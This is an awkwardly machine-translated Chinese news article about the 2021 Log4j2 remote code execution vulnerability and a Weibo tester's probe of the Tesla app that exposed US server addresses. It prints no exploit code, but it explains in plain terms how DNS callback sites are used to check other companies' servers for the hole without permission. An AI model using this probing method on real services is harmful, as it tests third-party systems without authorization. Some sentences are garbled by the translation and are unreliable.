This past weekend, the programmers were busy.
Everyone is working overtime to patch the same vulnerability.
Apache Log4j is a Java-based logging component. Apache Log4j2 is an upgraded version of Log4j that introduces a wealth of features by rewriting Log4j. This log component is widely used in business system development to record program input and output log information.
On November 24, 2021, the Alibaba Cloud security team officially reported the Apache Log4j2 remote code execution vulnerability to Apache. Due to the JNDI injection defect of the Log4j2 component in the handler logging, an unauthorized attacker can exploit this vulnerability to send specially crafted malicious data to the target server, trigger the Log4j2 component to parse the defect, implement arbitrary code execution of the target server, and obtain the permissions of the target server.
The CNVD's overall rating for the vulnerability is "high risk".
This is the national Internet emergency response center's introduction to this vulnerability.
Perhaps this description is still complicated for the non-programmer population. If it is simply "translated", it means that only a string of strings is needed, no password or authentication, to access any server that uses the Log4j2 Java library, or even run your own code directly inside.
In a way, it is equivalent to anyone can get a master key, enter any "home" using Log4j2, and then do what you want to do depends on the "thief".
The magnitude of the problem is already clear. The vulnerability was quickly dubbed a "nuclear bomb-level vulnerability" and "the biggest vulnerability in the history of modern computers" because the Java library Log4j2 was so popular.
"Almost every Internet company you can think of is using it."
Moreover, this loophole is also a "zero-day vulnerability". That is to say, at the same time as the vulnerability is discovered, the attack that exploits the vulnerability is already happening. Compared to hacker attacks where the vulnerability has been patched, the method of attack and the possibility of harm caused by this zero-day vulnerability are unknown, which puts the defender in the open and the attacker in the dark and can see your every move.
As the emergency response center said, the vulnerability was submitted to the authorities as early as the end of November. But before the patch came, things got serious — minecraft, one of the most popular games, suffered a massive attack on December 9 that exploited the vulnerability, and many servers in this Microsoft-owned game were shut down.
More developers are aware of the serious problem: Apple, Amazon, Steam, Tencent, 321094 packages for 60,644 open source projects on Github are on this list.
And according to Apache, Log4j2 is used as an open source component in different systems, making it impossible to track how much code is using it.
All the Internet companies panicked. Since last Friday, "almost all programmers are fixing Log4j2."
And the "attacks" that began based on vulnerability-related information also increased instantaneously. Internet security agencies have documented a large number of attacks that began on December 10, including not only malicious hacking, but also many "studies" from attempts to further understand the security impact of this vulnerability on themselves and some well-known companies. Many people enter relevant vulnerability characters in the login or search boxes of the most basic services such as Baidu and Google in the hope of getting a glimpse of the end.
The nature of this vulnerability means that it's like a clip that you can use to lift some of the firmer hijabs that companies usually shade and look inside — so that some unexpected "secondary disasters" arrive sooner before the more pernicious data breaches have occurred.
While the safety circle is boiling over, discussing how to fix it quickly, and constantly testing which companies are affected, a test of Tesla has brought up unexpected new problems.
On December 13, an Internet security person posted several screenshots on Weibo. And with the text:
Tesla still sent the data back to the United States.
According to these screenshots, the publisher tested the vulnerability on the Tesla mobile app, and the IP addresses of Tesla servers were quickly exposed, and a check of these IP addresses showed that the servers belonged to the United States.
"All the data generated by all the Chinese business is stored entirely in China" – Tesla CEO Elon Musk said. Musk made a lot of ground in September, but it seems that the corner of the loophole will be an army.
So what do these screenshots illustrate?
Let's simplify this test to a level that most people can understand. (This may lose some rigor — for example, the "open web page" mentioned below is actually a simplistic interpretation of dns parsing — but it can be more intuitively understood.)
To do this test, you first need a website that dnslog.cn or ceye.io. This website provides two functions, one is to generate a second-level domain name, that is, a website. The second is that when you send this URL to others, the other party opened the URL with a mobile phone or computer and other devices, you can get feedback on this website, the most basic information includes the opening time and IP address.
Theoretically, this "other" can be your next door leader or Tesla, but in general, Tesla's server does not make sense to click on the address you sent, unless you can make him have to click on. The log4j2 vulnerability is precisely the danger here. When this particular test statement is added to the URL, the Tesla software system that uses the Log4j2 component in the code will automatically open it "involuntarily", and then these traces will return to the sender.
In this way, you can also test Apple or Amazon and any other website for vulnerabilities. To use an analogy:
I have 3 children in front of me (i.e. three different companies), labeled A, B, C, each with a match, two matches that are damp and cannot be used, and one that is normal and can be lit (combustible means there is a loophole). To verify whose matches are combustible (i.e. to verify which company has a vulnerability), I found 3 firecrackers labeled a, b, c.
a gives the child A, b gives B, c gives C and asks them to light firecrackers.
After a while, the firecrackers sounded, and if you looked closely, you could see that the debris was a B firecracker, which proved that the match in the hand of the child B was combustible (with loopholes).
As mentioned earlier, after this loophole received widespread attention, a large number of such firecrackers began to occur. And this Weibo recorded a similar test. But this test not only showed that Tesla had a vulnerability and really opened one such "phishing" URL, but also the server address it exposed as a result, revealing more information:
When the tester placed the IP address he obtained by logging into Tesla's system in China and searched for it on whatsmyip (an IP query website), the ASN home location shown in the IP address was in the United States. These include Washington, New Jersey and Iowa.
One of the IP addresses shows the association to Washington.
There was an uproar.
The importance of the Tesla App for this smart electric car is self-evident.
Tesla owners often rely on mobile apps to manage their cars. In May last year, a number of car owners in China said that due to the large-scale downtime of Tesla App, the mobile phone could not be associated with the vehicle, which in turn led to the invalidity of the mobile phone key, the vehicle information could not be obtained, and the central control screen and dashboard in the car could not be activated.
Including driving and purchasing behavior, the personal information of Chinese Tesla owners is almost all entered on mobile apps. After upgrading the sentry mode in October this year, the mobile phone can already view the content of the car camera in real time. Tesla's statement at the time was that the live camera would be end-to-end encrypted and inaccessible to Tesla.
The integration of mobile apps, including real-time in-car content, is undoubtedly an increasingly sensitive part. A large number of sensitive information of Chinese car owners accumulates in mobile apps. Now, the screenshots show that the server to which the app is connected is pointing to the United States.
However, just below this Weibo, many different interpretations are also emerging. The seriousness of data security that this information can illustrate is not "consensus." Especially in the field of computer security, where smart people gather, different people give different understandings of this conclusion.
Some argue that this is just a routine operation. "It doesn't have to be data transfer, it may be that some interface is tuned." Someone commented.
A data security person gave a more general example:
"For example, If Tencent wants to count how many QQ users around the world are online at the same time, at this time, it will also count The Us users, right? But at this time, the transmission from the United States to China is actually just a statistical number of online people, not involving the user's personal information. At this time, do you say that China's Tencent company is collecting US data, you say yes, and it is not wrong to say that it is not. ”
Specific to Tesla, or Apple and other companies in a similar situation, whether he only called the service interface on the US server, or whether there is really a transmission of the user's personal information, has also become the key to judging whether the flow of this information is appropriate.
"This does not prove that other personal information, such as address books, text messages, photos, etc., also reached the United States." And whether the personal information collected by the other party is encrypted transmission and storage, and whether it complies with the data security life cycle disposal specifications of relevant laws and regulations, these are not based on the current information can be judged. Some security practitioners said.
In addition to this, the server address and database address are not necessarily in the same place.
Companies generally don't do this because cross-sea communication increases latency, but without instant messaging needs — such as data backups — the possibility of servers and databases being placed in both countries exists, another developer said.
Obviously, people are very cautious about this. However, it is a fact that from these screenshots and operations, a vulnerability test statement containing the domain name was indeed transmitted from China back to the US server. A blogger certified as a senior security expert for Ant said that from this screenshot, other data is not known, but the name data of the vehicle is definitely transmitted back to the United States.
Not far away, the owner's car name data was transmitted back to the United States, and I don't know what the reason was behind this.
This obviously puts Tesla China in a very sensitive and confusing situation. A test of vulnerabilities has once again made people realize how Tesla and Tesla China's claimed data retention is performed in China, what data still needs to be rotated in the United States, and in what form will they be turned around? Maybe even Tesla Chinese owners don't know it so far.
In the Personal Information Protection Law, which has come into effect in November 2021, it is stipulated that:
Article 39: Where personal information processors provide personal information outside the territory of the People's Republic of China, they shall inform individuals of matters such as the name or name, contact information, purpose of processing, method of processing, types of personal information, and the methods and procedures for individuals to exercise their rights under this Law to overseas recipients, and obtain the individual's separate consent.
In addition, many developers said that the test released on December 13 also shows that when the world began to work overtime to close this vulnerability on the 10th, Tesla did not seem to have started to deal with this vulnerability until the 13th. Some foreign media quoted the relevant person in charge of the well-known institution Fortress Information Security as saying that the entire Internet is far from finished repairing this vulnerability.
"But look at the calendar table, what's in two weeks, the Christmas holidays."
On December 14, Musk took his son to a time celebration. He was previously selected by Time as this year's Person of the Year.
"Since Apache Log4j2 is widely used in the secondary development of framework components and software and hardware products, the CNVD platform recommends that each vendor actively self-examine the software and hardware products and services developed, focusing on checking the references to Apache Apache Log4j2 components, and if it is found that it is affected by this vulnerability, please fix it immediately and notify product users to update it in time." On December 13, the National Internet Emergency Response Center also issued an announcement, suggesting that manufacturers check themselves in time and notify users.
The chaos caused by this vulnerability will continue for some time. There may be more "secondary" information disclosed because of it. What needs to be reminded here is that some Internet security related people said that it is not recommended that you take this vulnerability code to the major websites to try it casually, because this may bring unnecessary bad effects, and then let the operators themselves also take risks.
· The copyright of the article belongs to Pin Play and may not be reproduced without authorization.
· Send keywords Reprint, cooperation, recruitment to the product play WeChat public account, get the corresponding information.
· You can also follow us on Weibo, Zhihu, Today's Headlines, and Baijia.